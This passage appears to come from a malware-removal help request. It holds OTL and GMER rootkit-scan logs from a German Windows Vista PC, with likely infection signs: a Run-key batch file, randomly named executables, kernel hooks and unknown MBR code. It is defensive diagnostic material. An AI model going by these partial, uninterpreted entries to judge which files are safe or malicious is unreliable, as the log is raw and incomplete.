{5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - C:\Acer\Empowering Technology\eDataSecurity\x86\eDStoolbar.dll (Egis Incorporated.) O3 - HKLM\..\Toolbar: (Bing Bar) - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.) O3 - HKCU\..\Toolbar\ShellBrowser: (Acer eDataSecurity Management) - {5CBE3B7C-1E47-477E-A7DD-396DB0476E29} - C:\Acer\Empowering Technology\eDataSecurity\x86\eDStoolbar.dll (Egis Incorporated.) O4 - HKLM..\Run: [] File not found O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.) O4 - HKLM..\Run: [avgnt] C:\Program Files\Avira\AntiVir Desktop\avgnt.exe (Avira Operations GmbH & Co. 
KG) O4 - HKLM..\Run: [eRecoveryService] File not found O4 - HKLM..\Run: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe (Malwarebytes Corporation) O4 - HKLM..\Run: [Malwarebytes' Anti-Malware (reboot)] C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe (Malwarebytes Corporation) O4 - HKLM..\Run: [NetDrive] C:\Program Files\NetDrive\NetDrive.exe (Bdrive Inc.) O4 - HKLM..\Run: [SynTPStart] C:\Program Files\Synaptics\SynTP\SynTPStart.exe (Synaptics, Inc.) O4 - HKCU..\Run: [GameXN GO] C:\ProgramData\GameXN\GameXNGO.exe (EasyBits Software AS) O4 - HKCU..\Run: [Netdrive] C:\Program Files\NetDrive\netdrive.exe (Bdrive Inc.) O4 - HKCU..\Run: [pejo] C:\Users\ant\AppData\Roaming\pejo\vifier.bat () O4 - Startup: C:\Users\ant\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ownCloud.lnk = C:\Program Files\ownCloud Client\owncloud.exe () O8 - Extra context menu item: Add to Google Photos Screensa&ver - C:\Windows\System32\GPhotos.scr (Google Inc.) O8 - Extra context menu item: Google Sidewiki... - res://C:\Program Files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_950DF09FAB501E03.dll/cmsidewiki.html File not found O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.) O13 - gopher Prefix: missing O15 - HKCU\..Trusted Domains: fritz.box ([]* in Lokales Intranet) O15 - HKCU\..Trusted Ranges: Range1 ([*] in Lokales Intranet) O16 - DPF: {34DC6011-88B5-4EA9-BA7A-DC7B4F4437FE} hxxp://photoservice.fujicolor.eu/ips-opdata/objects/jordan.cab (JordanUploader Class) O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21) O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab (Reg Error: Key error.) 
O16 - DPF: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab (Java Plug-in 1.6.0_21)
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab (Reg Error: Key error.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.178.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{D6A7C132-CD4D-40B0-B557-D15BEBA0128B}: DhcpNameServer = 192.168.178.1
O18 - Protocol\Handler\livecall {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL File not found
O18 - Protocol\Handler\msnim {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL File not found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O24 - Desktop WallPaper: C:\Windows\Web\Wallpaper\img36.jpg
O24 - Desktop BackupWallPaper: C:\Windows\Web\Wallpaper\img36.jpg
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2006.09.18 23:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O33 - MountPoints2\{06099c25-89ca-11df-b824-001d722ce5cf}\Shell - "" = AutoRun
O33 - MountPoints2\{06099c25-89ca-11df-b824-001d722ce5cf}\Shell\AutoRun\command - "" = G:\USBAutoRun.exe
O33 - MountPoints2\{73e0bc52-f584-11df-848e-c5c0efcc5a54}\Shell - "" = AutoRun
O33 - MountPoints2\{73e0bc52-f584-11df-848e-c5c0efcc5a54}\Shell\AutoRun\command - "" = F:\Setup.exe
O33 - MountPoints2\{833a5916-e89a-11de-af94-806e6f6e6963}\Shell - "" = AutoRun
O33 - MountPoints2\{833a5916-e89a-11de-af94-806e6f6e6963}\Shell\AutoRun\command - "" = F:\LaunchU3.exe -a
O33 - MountPoints2\{9dbcd877-aaa6-11df-aff4-806e6f6e6963}\Shell\AutoRun\command - "" = F:\Menu.exe
O33 - MountPoints2\{d55ec516-5ea0-11df-a24c-806e6f6e6963}\Shell\AutoRun\command - "" = F:\Menu.exe
O33 - MountPoints2\F\Shell\AutoRun\command - "" = F:\Menu.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

========== Files/Folders - Created Within 30 Days ==========

[2013.06.02 17:02:09 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ant\Desktop\OTL.exe
[2013.06.02 17:01:27 | 000,000,000 | ---D | C] -- C:\Users\ant\Desktop\virus tools
[2013.06.02 14:56:33 | 000,000,000 | ---D | C] -- C:\Users\ant\Desktop\logs
[2013.05.20 14:57:29 | 000,000,000 | ---D | C] -- C:\Users\ant\Desktop\Handy Backup
[2013.05.19 21:22:16 | 000,000,000 | ---D | C] -- C:\Users\ant\AppData\Roaming\pejo
[2013.05.15 20:53:08 | 000,000,000 | ---D | C] -- C:\Users\ant\AppData\Roaming\MyPhoneExplorer
[2013.05.15 20:53:04 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PriceGong
[2013.05.15 20:53:03 | 000,000,000 | ---D | C] -- C:\Program Files\PriceGong
[2013.05.15 20:53:03 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyPhoneExplorer
[2013.05.15 20:52:14 | 000,000,000 | ---D | C] -- C:\Program Files\MyPhoneExplorer
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2013.06.02 17:11:17 | 000,001,094 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2013.06.02 17:11:09 | 000,003,616 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
[2013.06.02 17:11:09 | 000,003,616 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
[2013.06.02 17:10:55 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2013.06.02 17:10:49 | 3219,243,008 | -HS- | M] () -- C:\hiberfil.sys
[2013.06.02 17:09:39 | 000,000,020 | ---- | M] () -- C:\Users\ant\defogger_reenable
[2013.06.02 17:07:05 | 000,050,477 | ---- | M] () -- C:\Users\ant\Desktop\Defogger.exe
[2013.06.02 17:06:01 | 000,001,098 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2013.06.02 17:02:10 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ant\Desktop\OTL.exe
[2013.06.02 16:58:00 | 000,000,884 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2013.06.02 16:49:01 | 000,628,992 | ---- | M] () -- C:\Windows\System32\perfh007.dat
[2013.06.02 16:49:01 | 000,596,246 | ---- | M] () -- C:\Windows\System32\perfh009.dat
[2013.06.02 16:49:01 | 000,126,704 | ---- | M] () -- C:\Windows\System32\perfc007.dat
[2013.06.02 16:49:01 | 000,104,320 | ---- | M] () -- C:\Windows\System32\perfc009.dat
[2013.05.19 21:30:31 | 000,600,389 | ---- | M] () -- C:\Users\ant\5rfakc72togyi.exe
[2013.05.19 21:29:30 | 000,600,389 | ---- | M] () -- C:\Users\ant\5pyizgdrc5biy.exe
[2013.05.19 21:29:11 | 000,600,389 | ---- | M] () -- C:\Users\ant\q8x93h4akie10.exe
[2013.05.19 21:22:15 | 000,600,389 | ---- | M] () -- C:\Users\ant\9gghzlvklvp08.exe
[2013.05.19 09:30:23 | 000,001,851 | ---- | M] () -- C:\Users\Public\Desktop\Adobe Reader 9.lnk
[2013.05.18 22:43:51 | 000,411,192 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT
[2013.05.15 20:53:04 | 000,001,818 | ---- | M] () -- C:\Users\Public\Desktop\MyPhoneExplorer.lnk
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

========== Files Created - No Company Name ==========

[2013.06.02 17:09:24 | 000,000,020 | ---- | C] () -- C:\Users\ant\defogger_reenable
[2013.06.02 17:01:36 | 000,050,477 | ---- | C] () -- C:\Users\ant\Desktop\Defogger.exe
[2013.05.19 21:30:31 | 000,600,389 | ---- | C] () -- C:\Users\ant\5rfakc72togyi.exe
[2013.05.19 21:29:30 | 000,600,389 | ---- | C] () -- C:\Users\ant\5pyizgdrc5biy.exe
[2013.05.19 21:29:11 | 000,600,389 | ---- | C] () -- C:\Users\ant\q8x93h4akie10.exe
[2013.05.19 21:22:15 | 000,600,389 | ---- | C] () -- C:\Users\ant\9gghzlvklvp08.exe
[2013.05.15 20:53:04 | 000,001,818 | ---- | C] () -- C:\Users\Public\Desktop\MyPhoneExplorer.lnk
[2011.11.26 23:51:28 | 000,175,616 | ---- | C] () -- C:\Windows\System32\unrar.dll
[2011.11.26 23:51:26 | 000,650,752 | ---- | C] () -- C:\Windows\System32\xvidcore.dll
[2011.11.26 23:51:26 | 000,243,200 | ---- | C] () -- C:\Windows\System32\xvidvfw.dll
[2011.11.26 23:51:25 | 000,074,752 | ---- | C] () -- C:\Windows\System32\ff_vfw.dll
[2011.06.15 18:08:12 | 000,001,024 | ---- | C] () -- C:\Users\ant\.rnd
[2011.06.06 20:26:34 | 000,000,000 | ---- | C] () -- C:\Users\ant\AppData\Local\{5336EE4C-60E1-417C-926F-ED072C3704C0}
[2010.11.21 17:44:27 | 000,000,173 | -HS- | C] () -- C:\ProgramData\.zreglib
[2010.06.28 14:39:01 | 000,000,680 | ---- | C] () -- C:\Users\ant\AppData\Local\d3d9caps.dat
[2010.03.14 20:06:58 | 000,000,056 | -H-- | C] () -- C:\ProgramData\ezsidmv.dat
[2009.05.18 23:08:39 | 000,249,344 | ---- | C] () -- C:\Users\ant\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

========== ZeroAccess Check ==========

[2006.11.02 14:54:22 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012.06.08 19:47:00 | 011,586,048 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009.04.11 08:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009.04.11 08:28:25 | 000,347,648 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

========== LOP Check ==========

[2012.09.04 20:37:49 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\Cornelsen
[2010.11.21 17:37:15 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\DAEMON Tools Lite
[2009.11.09 14:21:11 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\ESET
[2009.05.19 21:40:19 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\fotobuch.de AG
[2009.11.09 14:20:41 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\FRITZ!
[2013.06.02 16:02:11 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\go
[2013.05.15 20:53:08 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\MyPhoneExplorer
[2012.09.28 23:31:15 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\NetDrive
[2009.05.18 23:02:36 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\OpenOffice.org
[2013.06.02 14:56:57 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\pejo
[2009.08.24 23:59:34 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\schroedelarbeitblaetter
[2010.11.21 17:44:36 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\SlySoft
[2009.11.09 13:44:20 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\Thunderbird
[2011.12.09 22:04:13 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\Trine2
[2012.12.25 23:04:09 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\TwonkyMedia
[2012.12.25 22:33:06 | 000,000,000 | ---D | M] -- C:\Users\ant\AppData\Roaming\TwonkyServer

========== Purity Check ==========

< End of report >

Code:
GMER 2.1.19163 - hxxp://www.gmer.net
Rootkit scan 2013-06-02 22:26:27
Windows 6.0.6002 Service Pack 2 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 WDC_WD2500BEVS-22UST0 rev.01.01A01 232,89GB
Running: gmer_2.1.19163.exe; Driver: C:\Users\ant\AppData\Local\Temp\kxtdrpow.sys

---- System - GMER 2.1 ----

SSDT 8C930A46 ZwCreateSection
SSDT 8C930A50 ZwRequestWaitReplyPort
SSDT 8C930A4B ZwSetContextThread
SSDT 8C930A55 ZwSetSecurityObject
SSDT 8C930A5A ZwSystemDebugControl
SSDT 8C9309E7 ZwTerminateProcess

---- Kernel code sections - GMER 2.1 ----

.text ntkrnlpa.exe!KeSetEvent + 215 826E9958 4 Bytes [46, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 539 826E9C7C 4 Bytes [50, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 56D 826E9CB0 4 Bytes [4B, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 5D1 826E9D14 4 Bytes [55, 0A, 93, 8C]
.text ntkrnlpa.exe!KeSetEvent + 619 826E9D5C 4 Bytes [5A, 0A, 93, 8C]
.text ...
.text C:\Windows\system32\DRIVERS\atikmdag.sys section is writeable [0x8E408000, 0x1F875A, 0xE8000020]

---- User code sections - GMER 2.1 ----

.text C:\Windows\Explorer.EXE[3140] SHELL32.dll!SHGetFolderPathAndSubDirW + 81C5 7602B37C 4 Bytes [F0, 1F, 00, 10] {POP DS; ADD [EAX], DL}
.text C:\Windows\Explorer.EXE[3140] SHELL32.dll!ShellExecuteExW + 18B7 7605DA14 4 Bytes [40, 1D, 00, 10]

---- Devices - GMER 2.1 ----

AttachedDevice \Driver\kbdclass \Device\KeyboardClass0 Wdf01000.sys
AttachedDevice \Driver\kbdclass \Device\KeyboardClass1 Wdf01000.sys
AttachedDevice \FileSystem\fastfat \Fat fltmgr.sys

---- Registry - GMER 2.1 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 C:\Program Files\DAEMON Tools Lite\
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0xC2 0x76 0xBB 0x58 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x58 0xB3 0xDD 0x04 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x0A 0x52 0xF8 0x64 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@p0 C:\Program Files\DAEMON Tools Lite\
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@u0 0x00 0x00 0x00 0x00 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@h0 0
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC@hdf12 0xC2 0x76 0xBB 0x58 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@a0 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001@hdf12 0x58 0xB3 0xDD 0x04 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\14919EA49A8F3B4AA3CF1058D9A64CEC\00000001\gdq0@hdf12 0x0A 0x52 0xF8 0x64 ...

---- Disk sectors - GMER 2.1 ----

Disk \Device\Harddisk0\DR0 unknown MBR code

---- EOF - GMER 2.1 ----

Code:
OTL Extras logfile created on: 02.06.2013 17:24:00 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ant\Desktop
Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy

3,00 Gb Total Physical Memory | 1,99 Gb Available Physical Memory | 66,28% Memory free
6,19 Gb Paging File | 5,21 Gb Available in Paging File | 84,05% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 111,57 Gb Total Space | 15,15 Gb Free Space | 13,58% Space Free | Partition Type: NTFS
Drive D: | 111,55 Gb Total Space | 35,46 Gb Free Space | 31,79% Space Free | Partition Type: NTFS
Drive G: | 1,86 Gb Total Space | 0,02 Gb Free Space | 1,00% Space Free | Partition Type: FAT

Computer Name: ANT-PC | User Name: ant | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

========== Extra Registry (SafeList) ==========

========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\System32\control.exe (Microsoft Corporation)
.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
.html [@ = ChromeHTML] -- C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.)

[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found

========== Shell Spawning ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" ()
Directory [CEWE FOTOSCHAU] -- "C:\Program Files\SCHLECKER\SCHLECKER Foto Digital Service\CEWE FOTOSCHAU.exe" -d "%1"
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" ()
Directory [SCHLECKER Foto Digital Service] -- "C:\Program Files\SCHLECKER\SCHLECKER Foto Digital Service\SCHLECKER Foto Digital Service.exe" "%1"
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring" = 1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
"VistaSp1" = Reg Error: Unknown registry data type -- File not found
"VistaSp2" = Reg Error: Unknown registry data type -- File not found

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]

========== Firewall Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\fotobuch.de AG\Designer 2.0\Designer.exe" = C:\Program Files\fotobuch.de AG\Designer 2.0\Designer.exe:*:Designer.exe

========== Vista Active Open Ports Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{01BAB6FB-2EE8-4338-ADD0-C0CED0CDA14B}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=c:\windows\system32\svchost.exe |
"{02A763CC-D826-4FF2-A962-1E02A0F68C4A}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{04BDF624-7EAE-4065-9209-8BFA933D833B}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{16CE6FD6-ACC3-4E6B-B5F8-465477CF0CA9}" = lport=2869 | protocol=6 | dir=in | app=system |
"{21565775-D419-44F2-BD2F-BE2C95BB9FD3}" = rport=445 | protocol=6 | dir=out | app=system |
"{525B6120-2283-4102-8418-1676D0E8F53A}" = rport=137 | protocol=17 | dir=out | app=system |
"{5D154A06-48C6-4B76-AE70-0C242389F7A6}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=svchost.exe |
"{5D4EEFAB-5D5B-42D4-8004-EEC11C0E38E0}" = lport=427 | protocol=17 | dir=in | name=druckvorgang |
"{6092F5AB-197D-42F3-9576-7269713779C5}" = lport=137 | protocol=17 | dir=in | name=druckvorgang |
"{63F62E60-2FC5-424D-9AE1-C634204CB5DB}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |
"{71F4296E-2DB3-4D6E-8FB9-23ACF99E6072}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{7469BC45-FD5D-4F16-8201-5B67ABFA03EF}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{7D09AC59-3128-489C-B1F0-F90CCBED92AE}" = lport=445 | protocol=6 | dir=in | app=system |
"{7E6B0420-F79A-44FF-8424-6FA970ACC849}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=c:\windows\system32\svchost.exe |
"{8F3EDFD5-44CA-4C46-80F6-42BD7EDEA80D}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{903D317E-BC5C-42C6-A3CA-5A837F68D22B}" = rport=138 | protocol=17 | dir=out | app=system |
"{9D62E869-2D8D-4B0C-B1E6-19666E027646}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{B4E6989F-428F-4223-884F-1724940DA61A}" = rport=139 | protocol=6 | dir=out | app=system |
"{C5E4B5F0-2565-47F0-BA30-E5D0A2C3F945}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{D13746C7-7958-4013-AECA-98927F72D0E3}" = lport=9100 | protocol=6 | dir=in | name=druckvorgang |
"{DDE5D42A-1EEF-4E00-92D0-47D0E51AB330}" = lport=137 | protocol=17 | dir=in | app=system |
"{E2E56FB5-755A-42A9-8A73-E880A0A13AE4}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{E484B1B6-C9CC-44A0-9B1A-14E884C1F0F5}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{EA8F5F1F-F977-40E7-A979-228DB1386A04}" = lport=2869 | protocol=6 | dir=in | app=system |
"{ECB97293-6157-4B56-A4ED-DFA434334AE6}" = lport=161 | protocol=17 | dir=in | name=druckvorgang |
"{F157BA55-7A62-4FB1-A0B3-8A82A599FA56}" = lport=138 | protocol=17 | dir=in | app=system |
